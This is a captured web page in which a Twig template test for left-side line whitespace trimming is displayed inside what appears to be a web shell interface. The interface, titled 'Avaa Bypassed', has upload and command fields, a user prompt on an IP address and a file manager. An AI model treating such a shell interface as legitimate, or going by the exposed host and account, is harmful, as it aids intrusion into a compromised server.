[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.145.72.55: ~ $
--TEST--
Line whitespace trimming on tags (left side).
--TEMPLATE--
**{% if true %}
foo
    	    {%~ endif %}**

**
	    {{~ 'foo' }}**

**
	{#~ comment #}**

**{% verbatim %}
foo
    
    	    {%~ endverbatim %}**
--DATA--
return []
--EXPECT--
**foo
**

**
foo**

**
**

**
foo
    
**

Filemanager

Name Type Size Permission Actions
trim_block.test File 881 B 0644
trim_delimiter_as_strings.test File 151 B 0644
trim_left.test File 285 B 0644
trim_line_left.test File 287 B 0644
trim_line_right.test File 305 B 0644
trim_right.test File 282 B 0644